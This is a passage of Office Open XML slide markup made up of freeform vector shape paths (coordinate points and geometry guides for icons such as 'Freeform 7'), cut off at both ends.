                  <a:pt x="990" y="1153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="990" y="1153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="984" y="1160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="970" y="1168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="970" y="1168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="963" y="1160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="956" y="1153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="956" y="1153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="950" y="1160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="950" y="1160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="950" y="1168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="950" y="1168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="928" y="1168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="928" y="1168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="935" y="1146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="935" y="1146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="935" y="1126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="935" y="1126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="943" y="1112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="943" y="1112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="956" y="1091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="956" y="1091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="956" y="1077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="956" y="1077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="956" y="1070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="956" y="1070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="935" y="1063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="935" y="1063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="1070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="1091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="1091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="1098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="1098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="894" y="1112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="894" y="1112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="880" y="1119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="880" y="1119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852" y="1126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852" y="1126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825" y="1119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825" y="1119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="811" y="1105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="796" y="1084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="796" y="1084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="790" y="1063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="783" y="1043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="783" y="1043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="790" y="1014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="790" y="1014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="790" y="987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="790" y="987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="783" y="959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="783" y="959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="796" y="945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="796" y="945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="811" y="938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="811" y="938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="811" y="938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="811" y="938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="818" y="938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="818" y="938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825" y="931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825" y="931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825" y="924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825" y="924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825" y="924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825" y="924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="818" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="818" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="873" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="887" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="887" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="908" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="908" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="908" y="910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="908" y="910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="908" y="889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="908" y="889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="921" y="910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="928" y="910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="943" y="904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="943" y="904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="963" y="910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="963" y="910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="984" y="910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="984" y="910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="990" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="990" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998" y="924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998" y="924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1005" y="924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1005" y="924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1012" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1012" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1026" y="945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1026" y="945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1039" y="980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1053" y="994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1053" y="994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1053" y="910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1039" y="904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1039" y="904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1039" y="889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1046" y="882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1046" y="882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060" y="862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060" y="862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1074" y="856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1074" y="856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1088" y="849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1088" y="849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108" y="842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108" y="842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1123" y="820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1123" y="800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1123" y="800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1130" y="800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1137" y="793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1137" y="793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1130" y="793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1130" y="793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1123" y="786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1123" y="786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1115" y="779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1115" y="779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1123" y="772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1115" y="765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1115" y="765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1130" y="751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1130" y="751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1137" y="737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1137" y="737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1150" y="751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1164" y="744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1164" y="744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1164" y="737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1164" y="723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1164" y="723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1171" y="717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1185" y="717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1185" y="717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1206" y="710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1213" y="703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1213" y="703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1220" y="703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1220" y="703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1220" y="688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1220" y="688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1226" y="675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1226" y="675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1240" y="661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1240" y="661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1261" y="661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282" y="647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282" y="647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282" y="640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282" y="640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1296" y="640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1317" y="626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1317" y="626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1324" y="619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1310" y="605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1310" y="605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1310" y="598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1302" y="598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1302" y="598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1289" y="591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1289" y="591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1302" y="591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1302" y="591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1317" y="584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1317" y="584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1317" y="584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1324" y="578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1302" y="571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1302" y="571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282" y="571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1255" y="584"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1060" y="1564"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1060" y="1564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1115" y="1550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1178" y="1536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1233" y="1515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1289" y="1487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1338" y="1460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1386" y="1432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1434" y="1390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1483" y="1348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1483" y="1348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1462" y="1348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1462" y="1348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1449" y="1341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1449" y="1341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1420" y="1334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1420" y="1334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1420" y="1321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1420" y="1321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1407" y="1307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1407" y="1307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1393" y="1300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1393" y="1300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1379" y="1293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1379" y="1293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1372" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1372" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1365" y="1279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1365" y="1279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1351" y="1272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1351" y="1272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1344" y="1272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1344" y="1272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1331" y="1272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1331" y="1272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1331" y="1272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1324" y="1279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1324" y="1279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1317" y="1279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1317" y="1279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1310" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1310" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1310" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1310" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1268" y="1265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1268" y="1265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1255" y="1258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1255" y="1258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1240" y="1251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1240" y="1251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1226" y="1244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1226" y="1244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1213" y="1251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1213" y="1251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1206" y="1272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1206" y="1272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1206" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1206" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1199" y="1279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1206" y="1265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1206" y="1265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1213" y="1251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1206" y="1244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1206" y="1244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1206" y="1237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1192" y="1237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1192" y="1237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1178" y="1244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1178" y="1244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1164" y="1258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1164" y="1258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1157" y="1265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1157" y="1265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1144" y="1265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1144" y="1265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1137" y="1279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1137" y="1279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1130" y="1293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1130" y="1293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1123" y="1300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1123" y="1300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108" y="1293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108" y="1293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1095" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1095" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1102" y="1327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1102" y="1327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108" y="1370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108" y="1370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108" y="1404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1102" y="1411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1095" y="1425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1095" y="1425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="1446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060" y="1467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060" y="1467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060" y="1487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1074" y="1494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1074" y="1494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="1522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067" y="1522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1053" y="1543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1053" y="1543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060" y="156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Freeform 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="705468" y="5007297"/>
            <a:ext cx="397974" cy="397301"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1498 w 1845"/>
              <a:gd name="T1" fmla="*/ 0 h 1718"/>
              <a:gd name="T2" fmla="*/ 1629 w 1845"/>
              <a:gd name="T3" fmla="*/ 21 h 1718"/>
              <a:gd name="T4" fmla="*/ 1741 w 1845"/>
              <a:gd name="T5" fmla="*/ 98 h 1718"/>
              <a:gd name="T6" fmla="*/ 1789 w 1845"/>
              <a:gd name="T7" fmla="*/ 146 h 1718"/>
              <a:gd name="T8" fmla="*/ 1837 w 1845"/>
              <a:gd name="T9" fmla="*/ 257 h 1718"/>
              <a:gd name="T10" fmla="*/ 1844 w 1845"/>
              <a:gd name="T11" fmla="*/ 1397 h 1718"/>
              <a:gd name="T12" fmla="*/ 1837 w 1845"/>
              <a:gd name="T13" fmla="*/ 1460 h 1718"/>
              <a:gd name="T14" fmla="*/ 1789 w 1845"/>
              <a:gd name="T15" fmla="*/ 1571 h 1718"/>
              <a:gd name="T16" fmla="*/ 1741 w 1845"/>
              <a:gd name="T17" fmla="*/ 1619 h 1718"/>
              <a:gd name="T18" fmla="*/ 1629 w 1845"/>
              <a:gd name="T19" fmla="*/ 1696 h 1718"/>
              <a:gd name="T20" fmla="*/ 1498 w 1845"/>
              <a:gd name="T21" fmla="*/ 1717 h 1718"/>
              <a:gd name="T22" fmla="*/ 1269 w 1845"/>
              <a:gd name="T23" fmla="*/ 1049 h 1718"/>
              <a:gd name="T24" fmla="*/ 1547 w 1845"/>
              <a:gd name="T25" fmla="*/ 793 h 1718"/>
              <a:gd name="T26" fmla="*/ 1269 w 1845"/>
              <a:gd name="T27" fmla="*/ 626 h 1718"/>
              <a:gd name="T28" fmla="*/ 1276 w 1845"/>
              <a:gd name="T29" fmla="*/ 571 h 1718"/>
              <a:gd name="T30" fmla="*/ 1297 w 1845"/>
              <a:gd name="T31" fmla="*/ 536 h 1718"/>
              <a:gd name="T32" fmla="*/ 1317 w 1845"/>
              <a:gd name="T33" fmla="*/ 522 h 1718"/>
              <a:gd name="T34" fmla="*/ 1373 w 1845"/>
              <a:gd name="T35" fmla="*/ 508 h 1718"/>
              <a:gd name="T36" fmla="*/ 1553 w 1845"/>
              <a:gd name="T37" fmla="*/ 501 h 1718"/>
              <a:gd name="T38" fmla="*/ 1553 w 1845"/>
              <a:gd name="T39" fmla="*/ 271 h 1718"/>
              <a:gd name="T40" fmla="*/ 1346 w 1845"/>
              <a:gd name="T41" fmla="*/ 257 h 1718"/>
              <a:gd name="T42" fmla="*/ 1262 w 1845"/>
              <a:gd name="T43" fmla="*/ 264 h 1718"/>
              <a:gd name="T44" fmla="*/ 1137 w 1845"/>
              <a:gd name="T45" fmla="*/ 313 h 1718"/>
              <a:gd name="T46" fmla="*/ 1082 w 1845"/>
              <a:gd name="T47" fmla="*/ 348 h 1718"/>
              <a:gd name="T48" fmla="*/ 1005 w 1845"/>
              <a:gd name="T49" fmla="*/ 459 h 1718"/>
              <a:gd name="T50" fmla="*/ 985 w 1845"/>
              <a:gd name="T51" fmla="*/ 605 h 1718"/>
              <a:gd name="T52" fmla="*/ 742 w 1845"/>
              <a:gd name="T53" fmla="*/ 793 h 1718"/>
              <a:gd name="T54" fmla="*/ 985 w 1845"/>
              <a:gd name="T55" fmla="*/ 1049 h 1718"/>
              <a:gd name="T56" fmla="*/ 347 w 1845"/>
              <a:gd name="T57" fmla="*/ 1717 h 1718"/>
              <a:gd name="T58" fmla="*/ 278 w 1845"/>
              <a:gd name="T59" fmla="*/ 1710 h 1718"/>
              <a:gd name="T60" fmla="*/ 153 w 1845"/>
              <a:gd name="T61" fmla="*/ 1661 h 1718"/>
              <a:gd name="T62" fmla="*/ 98 w 1845"/>
              <a:gd name="T63" fmla="*/ 1619 h 1718"/>
              <a:gd name="T64" fmla="*/ 21 w 1845"/>
              <a:gd name="T65" fmla="*/ 1515 h 1718"/>
              <a:gd name="T66" fmla="*/ 0 w 1845"/>
              <a:gd name="T67" fmla="*/ 1397 h 1718"/>
              <a:gd name="T68" fmla="*/ 0 w 1845"/>
              <a:gd name="T69" fmla="*/ 320 h 1718"/>
              <a:gd name="T70" fmla="*/ 21 w 1845"/>
              <a:gd name="T71" fmla="*/ 202 h 1718"/>
              <a:gd name="T72" fmla="*/ 98 w 1845"/>
              <a:gd name="T73" fmla="*/ 98 h 1718"/>
              <a:gd name="T74" fmla="*/ 153 w 1845"/>
              <a:gd name="T75" fmla="*/ 56 h 1718"/>
              <a:gd name="T76" fmla="*/ 278 w 1845"/>
              <a:gd name="T77" fmla="*/ 7 h 1718"/>
              <a:gd name="T78" fmla="*/ 1498 w 1845"/>
              <a:gd name="T79" fmla="*/ 0 h 17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845" h="1718">
                <a:moveTo>
                  <a:pt x="1498" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1498" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1567" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1629" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1692" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1741" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1741" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1789" y="146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1817" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1837" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1844" y="320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1844" y="1397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1844" y="1397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1837" y="1460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1817" y="1515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1789" y="1571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1741" y="1619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1741" y="1619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1692" y="1661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1629" y="1696"/>
